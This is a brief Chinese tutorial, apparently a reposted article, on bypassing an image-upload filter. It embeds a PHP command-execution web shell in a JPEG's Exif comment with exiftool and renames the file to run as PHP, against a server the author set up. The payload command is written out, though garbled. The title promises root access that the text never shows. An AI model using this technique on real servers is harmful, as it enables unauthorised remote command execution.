Shell如何上載到Web服務(wù)器并獲得Root

這篇文章主要介紹Shell如何上載到Web服務(wù)器并獲得Root，文中介紹的非常詳細(xì)，具有一定的參考價(jià)值，感興趣的小伙伴們一定要看完！

要求

本教程的這一部分將需要Nmap。

步驟1：掃描服務(wù)器

對(duì)于本教程，我在網(wǎng)絡(luò)上設(shè)置了易受攻擊的服務(wù)器。讓我們來掃描一下。  

Nmap找到了兩個(gè)開放端口：80和22，因此我們知道服務(wù)器同時(shí)具有HTTP和SSH服務(wù)。讓我們?cè)L問該網(wǎng)頁...

第2步：上傳嘗試

讓我們查看上傳頁面...

該表格告訴我們?cè)撐募仨毷?jpeg，.jpg或.png文件。但是，以防萬一，我們將嘗試上傳惡意的PHP文件。

真是的 它不會(huì)上傳。但是，如果我們將惡意代碼添加到圖片文件的Exif數(shù)據(jù)中怎么辦？

步驟3：將圖片后門

為了上傳我們的外殼，我們需要使用合法的圖片文件。為了使我們的代碼運(yùn)行，我們需要將PHP代碼添加到Exif數(shù)據(jù)中。輸入此命令：

exiftool -Comment =“ <？php passthru（\ $ _ GET'cmd'）; _halt_compiler（）;” /root/picture.jpeg

在\ $ _ GET'cmd'）; 代碼是讀取我們的命令的內(nèi)容，而_halt_compiler（）; 防止文件檢查系統(tǒng)繼續(xù)讀取二進(jìn)制數(shù)據(jù)。

現(xiàn)在，讓我們運(yùn)行命令的PHP代碼被添加到注釋中。將文件重命名為picture.php.jpeg，以便強(qiáng)制網(wǎng)站處理PHP代碼。

步驟4：再試一次    

現(xiàn)在，讓我們上傳后門文件。

是! 有效！現(xiàn)在，我們可以使用命令通過Web瀏覽器對(duì)其進(jìn)行控制。

以上是“Shell如何上載到Web服務(wù)器并獲得Root”這篇文章的所有內(nèi)容，感謝各位的閱讀！希望分享的內(nèi)容對(duì)大家有幫助，更多相關(guān)知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道！